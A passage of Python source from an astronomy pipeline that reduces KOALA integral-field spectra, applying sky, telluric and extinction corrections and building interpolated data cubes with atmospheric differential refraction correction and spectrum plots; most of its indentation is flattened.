# self.compute_integrated_fibre(plot=False, warnings=warnings) #title =" - Throughput corrected", text="after throughput correction..."
# count_negative = 0
# for i in range(self.n_spectra):
# if self.integrated_fibre[i] < 0.11 :
# #print " Fibre ",i," has an integrated flux of ", self.integrated_fibre[i]
# count_negative=count_negative+1
# print self.integrated_fibre
# print " Number of fibres with NEGATIVE integrated value AFTER SKY SUBSTRACTION = ", count_negative
# If this RSS is an offset sky, perform a median filter to increase S/N
if is_sky:
print("\n> This RSS file is defined as SKY... applying median filter with window {} ...".format(win_sky))
medfilt_sky = median_filter(
self.intensity_corrected, self.n_spectra, self.n_wave, win_sky=win_sky
)
self.intensity_corrected = copy.deepcopy(medfilt_sky)
print(" Median filter applied, results stored in self.intensity_corrected !")
# Get airmass and correct for extinction AFTER SKY SUBTRACTION
ZD = (self.ZDSTART + self.ZDEND)/2
self.airmass = 1/np.cos(np.radians(ZD))
self.extinction_correction = np.ones(self.n_wave)
if do_extinction:
self.do_extinction_curve(pth.join(DATA_PATH, "ssoextinct.dat"), plot=plot)
# Check if telluric correction is needed & apply
if telluric_correction[0] != 0:
plot_integrated_fibre_again = plot_integrated_fibre_again + 1
print("\n> Applying telluric correction...")
if plot:
plt.figure(figsize=(fig_size, fig_size / 2.5))
plt.plot(self.wavelength, telluric_correction)
plt.minorticks_on()
plt.axvline(x=self.valid_wave_min, color="k", linestyle="--")
plt.axvline(x=self.valid_wave_max, color="k", linestyle="--")
plt.xlim(self.wavelength[0] - 10, self.wavelength[-1] + 10)
plt.ylim(0.9, 2)
plt.title("Telluric correction")
plt.xlabel("Wavelength [$\AA$]")
# plt.show()
# plt.close()
if plot:
integrated_intensity_sorted = np.argsort(self.integrated_fibre)
region = [
integrated_intensity_sorted[-1],
integrated_intensity_sorted[0],
]
print(" Example of telluric correction using fibres {} and {} :".format(region[0], region[1]))
plt.figure(figsize=(fig_size, fig_size / 2.5))
plt.plot(
self.wavelength,
self.intensity_corrected[region[0]],
color="r",
alpha=0.3,
)
plt.plot(
self.wavelength,
self.intensity_corrected[region[1]],
color="r",
alpha=0.3,
)
for i in range(self.n_spectra):
self.intensity_corrected[i, :] = (
self.intensity_corrected[i, :] * telluric_correction
)
if plot:
plt.plot(
self.wavelength,
self.intensity_corrected[region[0]],
color="b",
alpha=0.5,
)
plt.plot(
self.wavelength,
self.intensity_corrected[region[1]],
color="g",
alpha=0.5,
)
plt.minorticks_on()
plt.axvline(x=self.valid_wave_min, color="k", linestyle="--")
plt.axvline(x=self.valid_wave_max, color="k", linestyle="--")
plt.xlim(self.wavelength[0] - 10, self.wavelength[-1] + 10)
plt.ylim(
np.nanmin(self.intensity_corrected[region[1]]),
np.nanmax(self.intensity_corrected[region[0]]),
) # CHECK THIS AUTOMATICALLY
plt.xlabel("Wavelength [$\AA$]")
# plt.show()
# plt.close()
# Check if identify emission lines is requested & do
if id_el:
if brightest_line_wavelength == 0:
self.el = self.identify_el(
high_fibres=high_fibres,
brightest_line=brightest_line,
cut=cut,
verbose=True,
plot=plot_id_el,
fibre=0,
broad=broad,
)
print("\n Emission lines identified saved in self.el !!")
else:
brightest_line_rest_wave = 6562.82
print("\n As given, line {} at rest wavelength = {} is at {}".format(brightest_line, brightest_line_rest_wave, brightest_line_wavelength))
self.el = [
[brightest_line],
[brightest_line_rest_wave],
[brightest_line_wavelength],
[7.2],
]
# PUTAAA sel.el=[peaks_name,peaks_rest, p_peaks_l, p_peaks_fwhm]
else:
self.el = [[0], [0], [0], [0]]
# Check if id_list provided
if id_list[0] != 0:
if id_el:
print("\n> Checking if identified emission lines agree with list provided")
# Read list with all emission lines to get the name of emission lines
emission_line_file = "data/lineas_c89_python.dat"
el_center, el_name = read_table(emission_line_file, ["f", "s"])
# Find brightest line to get redshift
for i in range(len(self.el[0])):
if self.el[0][i] == brightest_line:
obs_wave = self.el[2][i]
redshift = (self.el[2][i] - self.el[1][i])/self.el[1][i]
print(" Brightest emission line {} foud at {} , redshift = {}".format(brightest_line, obs_wave, redshift))
el_identified = [[], [], [], []]
n_identified = 0
for line in id_list:
id_check = 0
for i in range(len(self.el[1])):
if line == self.el[1][i]:
if verbose:
print(" Emission line {} {} has been identified".format(self.el[0][i], self.el[1][i]))
n_identified = n_identified + 1
id_check = 1
el_identified[0].append(self.el[0][i]) # Name
el_identified[1].append(self.el[1][i]) # Central wavelength
el_identified[2].append(
self.el[2][i]
) # Observed wavelength
el_identified[3].append(self.el[3][i]) # "FWHM"
if id_check == 0:
for i in range(len(el_center)):
if line == el_center[i]:
el_identified[0].append(el_name[i])
print(" Emission line {} {} has NOT been identified, adding...".format(el_name[i], line))
el_identified[1].append(line)
el_identified[2].append(line * (redshift + 1))
el_identified[3].append(4 * broad)
self.el = el_identified
print(" Number of emission lines identified = {} of a total of {} provided. self.el updated accordingly".format(n_identified, len(id_list)))
else:
print("\n> List of emission lines provided but no identification was requested")
# Clean sky residuals if requested
if clean_sky_residuals:
plot_integrated_fibre_again = plot_integrated_fibre_again + 1
self.clean_sky_residuals(
extra_w=extra_w,
step=step_csr,
dclip=dclip,
verbose=verbose,
fibre=fibre,
wave_min=valid_wave_min,
wave_max=valid_wave_max,
)
# set_data was till here... -------------------------------------------------------------------
if fibre != 0:
plot_integrated_fibre_again = 0
# Plot corrected values
if plot == True and rss_clean == False: # plot_integrated_fibre_again > 0 :
self.compute_integrated_fibre(
plot=plot,
title=" - Intensities Corrected",
warnings=warnings,
text="after all corrections have been applied...",
valid_wave_min=valid_wave_min,
valid_wave_max=valid_wave_max,
correct_negative_sky=correct_negative_sky,
)
integrated_intensity_sorted = np.argsort(self.integrated_fibre)
region = []
for fibre_ in range(high_fibres):
region.append(integrated_intensity_sorted[-1 - fibre_])
print("\n> Checking results using {} fibres with the highest integrated intensity".format(high_fibres))
print(" which are : {}".format(region))
plt.figure(figsize=(fig_size, fig_size / 2.5))
I = np.nansum(self.intensity[region], axis=0)
plt.plot(self.wavelength, I, "r-", label="Uncorrected", alpha=0.3)
Ic = np.nansum(self.intensity_corrected[region], axis=0)
plt.axhline(y=0, color="k", linestyle=":")
plt.plot(self.wavelength, Ic, "g-", label="Corrected", alpha=0.4)
plt.ylabel("Flux")
plt.xlabel("Wavelength [$\AA$]")
plt.minorticks_on()
plt.xlim(self.wavelength[0] - 10, self.wavelength[-1] + 10)
plt.axvline(x=self.valid_wave_min, color="k", linestyle="--")
plt.axvline(x=self.valid_wave_max, color="k", linestyle="--")
yy1 = np.nanpercentile(Ic, 0)
yy2 = np.nanpercentile(Ic, 99)
rango = yy2 - yy1
plt.ylim(yy1 - rango * 0.05, yy2)
plt.title("{} - Combined spectrum - {} fibres with highest intensity".format(self.object, high_fibres))
plt.legend(frameon=False, loc=4, ncol=2)
# plt.show()
# plt.close()
region = []
for fibre_ in range(high_fibres):
region.append(integrated_intensity_sorted[fibre_])
print("\n> Checking results using {} fibres with the lowest integrated intensity".format(high_fibres))
print(" which are : {}".format(region))
plt.figure(figsize=(fig_size, fig_size / 2.5))
I = np.nansum(self.intensity[region], axis=0)
plt.plot(self.wavelength, I, "r-", label="Uncorrected", alpha=0.3)
Ic = np.nansum(self.intensity_corrected[region], axis=0)
I_ymin = np.nanmin([np.nanmin(I), np.nanmin(Ic)])
I_ymax = np.nanmax([np.nanmax(I), np.nanmax(Ic)])
I_med = np.nanmedian(Ic)
I_rango = I_ymax - I_ymin
plt.axhline(y=0, color="k", linestyle=":")
plt.plot(self.wavelength, Ic, "g-", label="Corrected", alpha=0.4)
plt.ylabel("Flux")
plt.xlabel("Wavelength [$\AA$]")
plt.minorticks_on()
plt.xlim(self.wavelength[0] - 10, self.wavelength[-1] + 10)
plt.axvline(x=self.valid_wave_min, color="k", linestyle="--")
plt.axvline(x=self.valid_wave_max, color="k", linestyle="--")
# plt.ylim([I_ymin-I_rango/18,I_ymax-I_rango*0.65])
plt.ylim([I_med - I_rango * 0.65, I_med + I_rango * 0.65])
plt.title("{} - Combined spectrum - {} fibres with lowest intensity".format(self.object, high_fibres))
plt.legend(frameon=False, loc=4, ncol=2)
# plt.show()
# plt.close()
# Plot RSS_image
if plot:
self.RSS_image()
if rss_clean:
self.RSS_image()
# Print summary and information from header
print("\n> Summary of reading rss file ''{}'' :".format(filename))
print("\n This is a KOALA '{}' file, using grating '{}' in AAOmega".format(AAOmega_Arm, self.grating))
print(" Object: {}".format(self.object))
print(" Field of view: {} (spaxel size = {} arcsec)".format(field, self.spaxel_size))
print(" Center position: (RA, DEC) = ({:.3f}, {:.3f}) degrees".format(
self.RA_centre_deg, self.DEC_centre_deg
))
print(" Field covered [arcsec] = {:.1f} x {:.1f}".format(
self.RA_segment + self.spaxel_size, self.DEC_segment + self.spaxel_size
))
print(" Position angle (PA) = {:.1f} degrees".format(self.PA))
print(" ")
if rss_clean:
print(" This was a CLEAN RSS file, no correction was applied!")
print(" Values stored in self.intensity_corrected are the same that those in self.intensity")
else:
if flat != "":
print(" Intensities divided by the given flatfield")
if apply_throughput:
print(" Intensities corrected for throughput !")
else:
print(" Intensities NOT corrected for throughput")
if correct_ccd_defects == True and correct_high_cosmics == True:
print(" Intensities corrected for high cosmics and CCD defects !")
if correct_ccd_defects == True and correct_high_cosmics == False:
print(" Intensities corrected for CCD defects (but NOT for high cosmics) !")
if correct_ccd_defects == False and correct_high_cosmics == False:
print(" Intensities NOT corrected for high cosmics and CCD defects")
if sol[0] != 0:
print(" All fibres corrected for small wavelength shifts using wavelength solution provided!")
else:
if fix_wavelengths:
print(" Wavelengths corrected for small shifts using Gaussian fit to selected bright skylines in all fibres!")
else:
print(" Wavelengths NOT corrected for small shifts")
if is_sky:
print(" This is a SKY IMAGE, median filter with window {} applied !".format(win_sky))
else:
if sky_method == "none":
print(" Intensities NOT corrected for sky emission")
if sky_method == "self":
print(" Intensities corrected for sky emission using {} spaxels with lowest values !".format(n_sky))
if sky_method == "1D":
print(" Intensities corrected for sky emission using (scaled) spectrum provided ! ")
if sky_method == "1Dfit":
print(" Intensities corrected for sky emission fitting Gaussians to both 1D sky spectrum and each fibre ! ")
if sky_method == "2D":
print(" Intensities corrected for sky emission using sky image provided scaled by {} !".format(scale_sky_rss))
if telluric_correction[0] != 0:
print(" Intensities corrected for telluric absorptions !")
else:
print(" Intensities NOT corrected for telluric absorptions")
if do_extinction:
print(" Intensities corrected for extinction !")
else:
print(" Intensities NOT corrected for extinction")
if correct_negative_sky:
print(" Intensities CORRECTED (if needed) for negative integrate flux values!")
if id_el:
print(" ", len(
self.el[0]
), "emission lines identified and stored in self.el !")
print(" ", self.el[0])
if clean_sky_residuals == True and fibre == 0:
print(" Intensities cleaned for sky residuals !")
if clean_sky_residuals == True and fibre != 0:
print(" Only fibre {} has been corrected for sky residuals".format(fibre))
if clean_sky_residuals == False:
print(" Intensities NOT corrected for sky residuals")
print(" All applied corrections are stored in self.intensity_corrected !")
if save_rss_to_fits_file != "":
save_rss_fits(self, fits_file=save_rss_to_fits_file)
print("\n> KOALA RSS file read !")
# -----------------------------------------------------------------------------
# INTERPOLATED CUBE CLASS
# -----------------------------------------------------------------------------
class Interpolated_cube(object): # TASK_Interpolated_cube
"""
Constructs a cube by accumulating RSS with given offsets.
"""
# -----------------------------------------------------------------------------
def __init__(
self,
RSS,
pixel_size_arcsec,
kernel_size_arcsec,
centre_deg=[],
size_arcsec=[],
aligned_coor=False,
plot=False,
flux_calibration=[0],
zeros=False,
ADR=False,
force_ADR=False,
offsets_files="",
offsets_files_position="",
shape=[],
rss_file="",
warnings=False,
): # Angel added aligned_coor 6 Sep, flux_calibration, zeros 27 Oct;
# added ADR 28 Feb offsets_files, shape for defining shape of cube
# warnings (when cubing) added 13 Jan 2019
"""
Parameters
----------
RSS
pixel_size_arcsec
kernel_size_arcsec
centre_deg
size_arcsec
aligned_coor
plot
flux_calibration
zeros
ADR
force_ADR
offsets_files
offsets_files_position
shape
rss_file
warnings
"""
self.RSS = RSS
self.n_wave = RSS.n_wave
self.pixel_size_arcsec = pixel_size_arcsec
self.kernel_size_arcsec = kernel_size_arcsec
self.kernel_size_pixels = (
float(kernel_size_arcsec/pixel_size_arcsec)
) # must be a float number!
self.wavelength = RSS.wavelength
self.description = RSS.description + " - CUBE"
self.object = RSS.object
self.PA = RSS.PA
self.grating = RSS.grating
self.CRVAL1_CDELT1_CRPIX1 = RSS.CRVAL1_CDELT1_CRPIX1
self.total_exptime = RSS.exptime
self.rss_list = RSS.rss_list
self.RA_segment = RSS.RA_segment
self.offsets_files = offsets_files # Offsets between files when align cubes
self.offsets_files_position = (
offsets_files_position # Position of this cube when aligning
)
self.valid_wave_min = RSS.valid_wave_min
self.valid_wave_max = RSS.valid_wave_max
self.seeing = 0.0
self.flux_cal_step = 0.0
self.flux_cal_min_wave = 0.0
self.flux_cal_max_wave = 0.0
if zeros:
print("\n> Creating empty cube using information provided in rss file: ")
print(" {}".format(self.description))
else:
print("\n> Creating cube from file rss file: {}".format(self.description))
print(" Pixel size = {} arcsec".format(self.pixel_size_arcsec))
print(" kernel size = {} arcsec".format(self.kernel_size_arcsec))
# centre_deg = [RA,DEC] if we need to give new RA, DEC centre
if len(centre_deg) == 2:
self.RA_centre_deg = centre_deg[0]
self.DEC_centre_deg = centre_deg[1]
else:
self.RA_centre_deg = RSS.RA_centre_deg
self.DEC_centre_deg = RSS.DEC_centre_deg
if aligned_coor == True:
self.xoffset_centre_arcsec = (
self.RA_centre_deg - RSS.ALIGNED_RA_centre_deg
) * 3600.0
self.yoffset_centre_arcsec = (
self.DEC_centre_deg - RSS.ALIGNED_DEC_centre_deg
) * 3600.0
print(self.RA_centre_deg)
print(RSS.ALIGNED_RA_centre_deg)
print((self.RA_centre_deg - RSS.ALIGNED_RA_centre_deg) * 3600.0)
print("\n\n\n\n")
if zeros == False:
print(" Using ALIGNED coordenates for centering cube...")
else:
self.xoffset_centre_arcsec = (
self.RA_centre_deg - RSS.RA_centre_deg
) * 3600.0
self.yoffset_centre_arcsec = (
self.DEC_centre_deg - RSS.DEC_centre_deg
) * 3600.0
if len(size_arcsec) == 2:
self.n_cols = np.int((size_arcsec[0]/self.pixel_size_arcsec)) + 2 * np.int(
(self.kernel_size_arcsec/self.pixel_size_arcsec)
)
self.n_rows = np.int((size_arcsec[1]/self.pixel_size_arcsec)) + 2 * np.int(
(self.kernel_size_arcsec/self.pixel_size_arcsec)
)
else:
self.n_cols = (
2
* (
np.int(
(np.nanmax(
np.abs(RSS.offset_RA_arcsec - self.xoffset_centre_arcsec)
)/self.pixel_size_arcsec)
)
+ np.int(self.kernel_size_pixels)
)
+ 3
) # -3 ### +1 added by Angel 25 Feb 2018 to put center in center
self.n_rows = (
2
* (
np.int(
(np.nanmax(
np.abs(RSS.offset_DEC_arcsec - self.yoffset_centre_arcsec)
)/self.pixel_size_arcsec)
)
+ np.int(self.kernel_size_pixels)
)
+ 3
) # -3 ### +1 added by Angel 25 Feb 2018 to put center in center
if self.n_cols % 2 != 0:
self.n_cols += 1 # Even numbers to have [0,0] in the centre
if self.n_rows % 2 != 0:
self.n_rows += 1
# If we define a specific shape
if len(shape) == 2:
self.n_rows = shape[0]
self.n_cols = shape[1]
# Define zeros
self._weighted_I = np.zeros((self.n_wave, self.n_rows, self.n_cols))
self._weight = np.zeros_like(self._weighted_I)
self.flux_calibration = np.zeros(self.n_wave)
# self.offset_from_center_x_arcsec = 0.
# self.offset_from_center_y_arcsec = 0.
if zeros:
self.data = np.zeros_like(self._weighted_I)
else:
print("\n Smooth cube, (RA, DEC)_centre = ({}, {}) degree".format(
self.RA_centre_deg, self.DEC_centre_deg
))
print(" Size = {} columns (RA) x {} rows (DEC); {:.2f} x {:.2f} arcsec".format(
self.n_cols,
self.n_rows,
(self.n_cols + 1) * pixel_size_arcsec,
(self.n_rows + 1) * pixel_size_arcsec,
))
sys.stdout.write(" Adding {} spectra... ".format(RSS.n_spectra))
sys.stdout.flush()
output_every_few = np.sqrt(RSS.n_spectra) + 1
next_output = -1
for i in range(RSS.n_spectra):
if i > next_output:
sys.stdout.write("\b" * 6)
sys.stdout.write("{:5.2f}%".format(i * 100.0 / RSS.n_spectra))
sys.stdout.flush()
next_output = i + output_every_few
offset_rows = ((
RSS.offset_DEC_arcsec[i] - self.yoffset_centre_arcsec
)/pixel_size_arcsec)
offset_cols = ((
-RSS.offset_RA_arcsec[i] + self.xoffset_centre_arcsec
)/pixel_size_arcsec)
corrected_intensity = RSS.intensity_corrected[i]
self.add_spectrum(
corrected_intensity, offset_rows, offset_cols, warnings=warnings
)
self.data = self._weighted_I/self._weight
self.trace_peak(plot=plot)
# Check flux calibration
if np.nanmedian(flux_calibration) == 0:
fcal = False
else:
self.flux_calibration = flux_calibration
fcal = True
# This should be in 1 line of step of loop, I couldn't get it # Yago HELP !!
for x in range(self.n_rows):
for y in range(self.n_cols):
self.data[:, x, y] = (
(((self.data[:, x, y]/self.flux_calibration)/1e16)/self.RSS.exptime)
)
# plt.plot(self.wavelength,self.data[:,x,y]) #
# ylabel="Flux [ erg cm$^{-2}$ s$^{-1}$ A$^{-1}$]"
# Correct for Atmospheric Differential Refraction (ADR) if requested
if ADR:
self.ADR_correction(plot=plot, force_ADR=force_ADR)
else:
print("\n> Data NO corrected for Atmospheric Differential Refraction (ADR).")
# Get integrated maps (all waves and valid range), locate peaks, plots
self.get_integrated_map_and_plot(plot=plot, fcal=fcal)
# For calibration stars, we get an integrated star flux and a seeing
self.integrated_star_flux = np.zeros_like(self.wavelength)
if fcal:
print("\n> Absolute flux calibration included in this interpolated cube.")
else:
print("\n> This interpolated cube does not include an absolute flux calibration.")
print("> Interpolated cube done!\n")
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
    def ADR_correction(self, plot=True, force_ADR=False):
        """
        Correct for Atmospheric Diferential Refraction (ADR).

        Works on a deep copy of ``self.data`` stored in ``self.data_ADR``:
        each wavelength plane is shifted by the previously traced ADR offsets
        (``self.ADR_x`` / ``self.ADR_y``), after replacing NaNs so the
        interpolation inside ``shift`` does not propagate them.

        Parameters
        ----------
        plot
            Forwarded to ``trace_peak`` when re-checking the corrected data.
        force_ADR
            Apply the correction even when the measured ADR maxima are below
            half a pixel (when it would normally be skipped).

        Returns
        -------
        None.  The corrected cube is stored in ``self.data_ADR``.
        """
        self.data_ADR = copy.deepcopy(self.data)
        do_ADR = True
        # First we check if it is needed (unless forced)...
        if (
            self.ADR_x_max < self.pixel_size_arcsec/2
            and self.ADR_y_max < self.pixel_size_arcsec/2
        ):
            print("\n> Atmospheric Differential Refraction (ADR) correction is NOT needed.")
            print("  The computed max ADR values ({:.2f},{:.2f}) are smaller than half the pixel size of {:.2f} arcsec".format(
                self.ADR_x_max, self.ADR_y_max, self.pixel_size_arcsec
            ))
            do_ADR = False
            if force_ADR:
                print('  However we proceed to do the ADR correction as indicated: "force_ADR = True" ...')
                do_ADR = True
        if do_ADR:
            print("\n> Correcting for Atmospheric Differential Refraction (ADR)...")
            sys.stdout.flush()
            output_every_few = np.sqrt(self.n_wave) + 1
            next_output = -1
            # Shift every wavelength plane independently.
            for l in range(self.n_wave):
                if l > next_output:
                    # Progress indicator (overwrites itself with backspaces).
                    sys.stdout.write("\b" * 36)
                    sys.stdout.write(
                        "  Moving plane {:5}/{:5}... {:5.2f}%".format(
                            l, self.n_wave, l * 100.0 / self.n_wave
                        )
                    )
                    sys.stdout.flush()
                    next_output = l + output_every_few
                tmp = copy.deepcopy(self.data_ADR[l, :, :])
                mask = copy.deepcopy(tmp) * 0.0
                mask[np.where(np.isnan(tmp))] = 1  # make mask where Nans are
                # Fill NaNs by Gaussian-kernel interpolation so the spline
                # interpolation inside shift() has finite input everywhere.
                kernel = Gaussian2DKernel(5)
                tmp_nonan = interpolate_replace_nans(tmp, kernel)
                # need to see if there are still nans. This can happen in the padded parts of the grid
                # where the kernel is not large enough to cover the regions with NaNs.
                if np.isnan(np.sum(tmp_nonan)):
                    tmp_nonan = np.nan_to_num(tmp_nonan)
                # NOTE(review): the -2 factor converting ADR (arcsec) to a
                # pixel shift is taken as-is — confirm against trace_peak.
                tmp_shift = shift(
                    tmp_nonan,
                    [
                        (-2 * self.ADR_y[l]/self.pixel_size_arcsec),
                        (-2 * self.ADR_x[l]/self.pixel_size_arcsec),
                    ],
                    cval=np.nan,
                )
                # Shift the NaN mask the same way and re-flag shifted NaNs.
                mask_shift = shift(
                    mask,
                    [
                        (-2 * self.ADR_y[l]/self.pixel_size_arcsec),
                        (-2 * self.ADR_x[l]/self.pixel_size_arcsec),
                    ],
                    cval=np.nan,
                )
                tmp_shift[mask_shift > 0.5] = np.nan
                self.data_ADR[l, :, :] = copy.deepcopy(tmp_shift)
            # Check values tracing ADR data ...
            self.trace_peak(ADR=True, plot=plot)
        # TODO: saving the ADR-corrected data to disk is not implemented yet.
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def get_integrated_map_and_plot(
self, min_wave=[0], max_wave=[0], plot=True, fcal=False
): # CHECK
"""
Integrated map and plot
Parameters
----------
min_wave
max_wave
plot
fcal
Returns
-------
"""
# Integrated map between good wavelengths
if min_wave == [0]:
min_wave = self.valid_wave_min
if max_wave == [0]:
max_wave = self.valid_wave_max
self.integrated_map_all = np.nansum(self.data, axis=0)
self.integrated_map = np.nansum(
self.data[
np.searchsorted(self.wavelength, min_wave): np.searchsorted(
self.wavelength, max_wave
)
],
axis=0,
)
# Search for peak of emission in integrated map and compute offsets from centre
self.max_y, self.max_x = np.unravel_index(
self.integrated_map.argmax(), self.integrated_map.shape
)
self.spaxel_RA0 = np.int(self.n_cols/2) + 1 # Using np.int for readability
self.spaxel_DEC0 = np.int(self.n_rows/2) + 1 # Using np.int for readability
self.offset_from_center_x_arcsec_integrated = (
self.max_x - self.spaxel_RA0 + 1
) * self.pixel_size_arcsec # Offset from center using INTEGRATED map
self.offset_from_center_y_arcsec_integrated = (
self.max_y - self.spaxel_DEC0 + 1
) * self.pixel_size_arcsec # Offset from center using INTEGRATED map
if plot:
self.plot_spectrum_integrated_cube(fcal=fcal)
self.plot_spectrum_cube(self.max_y, self.max_x, fcal=fcal)
print("\n> Created integrated map between {:5.2f} and {:5.2f}.".format(
min_wave, max_wave
))
print(" The peak of the emission in integrated image is in spaxel [ {} , {} ]".format(self.max_x, self.max_y))
print(" The peak of the emission tracing all wavelengths is in spaxel [ {} , {} ]".format(
np.round(self.x_peak_median, 2), np.round(self.y_peak_median, 2)))
self.offset_from_center_x_arcsec_tracing = (
self.x_peak_median - self.spaxel_RA0 + 1
) * self.pixel_size_arcsec # Offset from center using INTEGRATED map
self.offset_from_center_y_arcsec_tracing = (
self.y_peak_median - self.spaxel_DEC0 + 1
) * self.pixel_size_arcsec # Offset from center using INTEGRATED map
if plot:
self.plot_map(
norm=colors.Normalize(),
spaxel=[self.max_x, self.max_y],
spaxel2=[self.x_peak_median, self.y_peak_median],
fcal=fcal,
)
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def add_spectrum(self, intensity, offset_rows, offset_cols, warnings=False):
"""
Add one single spectrum to the datacube
Parameters
----------
intensity: np.array(float)
Spectrum.
offset_rows, offset_cols: float
Offset with respect to the image centre, in pixels.
kernel_FWHM_pixels: float
FWHM of the interpolating kernel, in pixels
"""
kernel_centre_x = 0.5 * self.n_cols + offset_cols
x_min = int(kernel_centre_x - self.kernel_size_pixels)
x_max = int(kernel_centre_x + self.kernel_size_pixels) + 1
n_points_x = x_max - x_min
x = (
(np.linspace(x_min - kernel_centre_x, x_max - kernel_centre_x, n_points_x)/self.kernel_size_pixels)
)
x[0] = -1.0
x[-1] = 1.0
weight_x = np.diff(((3.0 * x - x ** 3 + 2.0)/4))
kernel_centre_y = 0.5 * self.n_rows + offset_rows
y_min = int(kernel_centre_y - self.kernel_size_pixels)
y_max = int(kernel_centre_y + self.kernel_size_pixels) + 1
n_points_y = y_max - y_min
y = (
(np.linspace(y_min - kernel_centre_y, y_max - kernel_centre_y, n_points_y)/self.kernel_size_pixels)
)
y[0] = -1.0
y[-1] = 1.0
weight_y = np.diff(((3.0 * y - y ** 3 + 2.0)/4))
if x_min < 0 or x_max >= self.n_cols or y_min < 0 or y_max >= self.n_rows:
if warnings:
print("**** WARNING **** : Spectra outside field of view: {} {} {}".format(x_min, kernel_centre_x, x_max))
print(" : {} {} {}".format(y_min, kernel_centre_y, y_max))
else:
bad_wavelengths = np.argwhere(np.isnan(intensity))
intensity[bad_wavelengths] = 0.0
ones = np.ones_like(intensity)
ones[bad_wavelengths] = 0.0
self._weighted_I[:, y_min: y_max - 1, x_min: x_max - 1] += (
intensity[:, np.newaxis, np.newaxis]
* weight_y[np.newaxis, :, np.newaxis]
* weight_x[np.newaxis, np.newaxis, :]
)
self._weight[:, y_min: y_max - 1, x_min: x_max - 1] += (
ones[:, np.newaxis, np.newaxis]
* weight_y[np.newaxis, :, np.newaxis]
* weight_x[np.newaxis, np.newaxis, :]
)
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def plot_spectrum_cube(
self,
x,
y,
lmin=0,
lmax=0,
fmin=1e-30,
fmax=1e30,
fcal=False,
fig_size=10.0,
fig_size_y=0.0,
save_file="",
title="",
z=0.0,
): # Angel added 8 Sep
"""
Plot spectrum of a particular spaxel.
Parameters
----------
x, y:
coordenates of spaxel to show spectrum.
fcal:
Use flux calibration, default fcal=False.\n
If fcal=True, cube.flux_calibration is used.
save_file:
(Optional) Save plot in file "file.extension"
fig_size:
Size of the figure (in x-axis), default: fig_size=10
Example
-------
>>> cube.plot_spectrum_cube(20, 20, fcal=True)
"""
if np.isscalar(x):
if fcal == False:
spectrum = self.data[:, x, y]
ylabel = "Flux [relative units]"
else:
spectrum = self.data[:, x, y] * 1e16 # /self.flux_calibration / 1E16
# ylabel="Flux [ 10$^{-16}$ * erg cm$^{-2}$ s$^{-1}$ A$^{-1}$]"
ylabel = "Flux [ 10$^{-16}$ erg cm$^{-2}$ s$^{-1}$ A$^{-1}$]"
else:
print(" Adding spaxel 1 = [ {} , {} ]".format(x[0], y[0]))
spectrum = self.data[:, x[0], y[0]]
for i in range(len(x) - 1):
spectrum = spectrum + self.data[:, x[i + 1], y[i + 1]]
print(" Adding spaxel {} = [ {} , {}]".format(i + 2, x[i + 1],[i + 1]))
ylabel = "Flux [relative units]"
if fcal:
spectrum = (spectrum/self.flux_calibration)/1e16
ylabel = "Flux [ erg cm$^{-2}$ s$^{-1}$ A$^{-1}$]"
# Set limits
if fmin == 1e-30:
fmin = np.nanmin(spectrum)
if fmax == 1e30:
fmax = np.nanmax(spectrum)
if lmin == 0:
lmin = self.wavelength[0]
if lmax == 0:
lmax = self.wavelength[-1]
if fig_size_y == 0.0:
fig_size_y = fig_size / 3.0
plt.figure(figsize=(fig_size, fig_size_y))
plt.plot(self.wavelength, spectrum)
plt.minorticks_on()
plt.ylim(fmin, fmax)
plt.xlim(lmin, lmax)
if title == "":
title = "Spaxel ({} , {}) in {}".format(x, y, self.description)
plt.title(title)
plt.xlabel("Wavelength [$\AA$]")
plt.ylabel(ylabel)
# Identify lines
if z != 0:
elines = [
3727.00,
3868.75,
3967.46,
3889.05,
4026.0,
4068.10,
4101.2,
4340.47,
4363.21,
4471.48,
4658.10,
4686.0,
4711.37,
4740.16,
4861.33,
4958.91,
5006.84,
5197.82,
6300.30,
6312.10,
6363.78,
6548.03,
6562.82,
6583.41,
6678.15,
6716.47,
6730.85,
7065.28,
7135.78,
7281.35,
7320,
7330,
]
# elines=[3727.00, 3868.75, 3967.46, 3889.05, 4026., 4068.10, 4101.2, 4340.47, 4363.21, 4471.48, 4658.10, 4861.33, 4958.91, 5006.84, 5197.82, 6300.30, 6312.10, 6363.78, 6548.03, 6562.82, 6583.41, 6678.15, 6716.47, 6730.85, 7065.28, 7135.78, 7320, 7330 ]
for i in elines:
plt.plot([i * (1 + z), i * (1 + z)], [fmin, fmax], "g:", alpha=0.95)
alines = [3934.777, 3969.588, 4308, 5175] # ,4305.61, 5176.7] # POX 4
# alines=[3934.777,3969.588,4308,5170] #,4305.61, 5176.7]
for i in alines:
plt.plot([i * (1 + z), i * (1 + z)], [fmin, fmax], "r:", alpha=0.95)
if save_file == "":
#plt.show()
pass
else:
plt.savefig(save_file)
#plt.close()
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def plot_spectrum_integrated_cube(
self,
lmin=0,
lmax=0,
fmin=1e-30,
fmax=1e30,
fcal=False,
fig_size=10,
save_file="",
): # Angel added 8 Sep
"""
Plot integrated spectrum
Parameters
----------
fcal:
Use flux calibration, default fcal=False.\n
If fcal=True, cube.flux_calibration is used.
save_file:
(Optional) Save plot in file "file.extension"
fig_size:
Size of the figure (in x-axis), default: fig_size=10
Example
-------
>>> cube.plot_spectrum_cube(20, 20, fcal=True)
"""
spectrum = np.nansum(np.nansum(self.data, axis=1), axis=1)
if fcal == False:
ylabel = "Flux [relative units]"
else:
spectrum = spectrum * 1e16
# ylabel="Flux [ 10$^{-16}$ * erg cm$^{-2}$ s$^{-1}$ A$^{-1}$]"
ylabel = "Flux [ 10$^{-16}$ erg cm$^{-2}$ s$^{-1}$ A$^{-1}$]"
# Set limits
if fmin == 1e-30:
fmin = np.nanmin(spectrum)
if fmax == 1e30:
fmax = np.nanmax(spectrum)
if lmin == 0:
lmin = self.wavelength[0]
if lmax == 0:
lmax = self.wavelength[-1]
plt.figure(figsize=(fig_size, fig_size / 2.5))
plt.plot(self.wavelength, spectrum)
plt.minorticks_on()
plt.ylim(fmin, fmax)
plt.xlim(lmin, lmax)
title = "Integrated spectrum in {}".format(self.description)
plt.title(title)
plt.xlabel("Wavelength [$\AA$]")
plt.ylabel(ylabel)
if save_file == "":
#plt.show()
pass
else:
plt.savefig(save_file)
#plt.close()
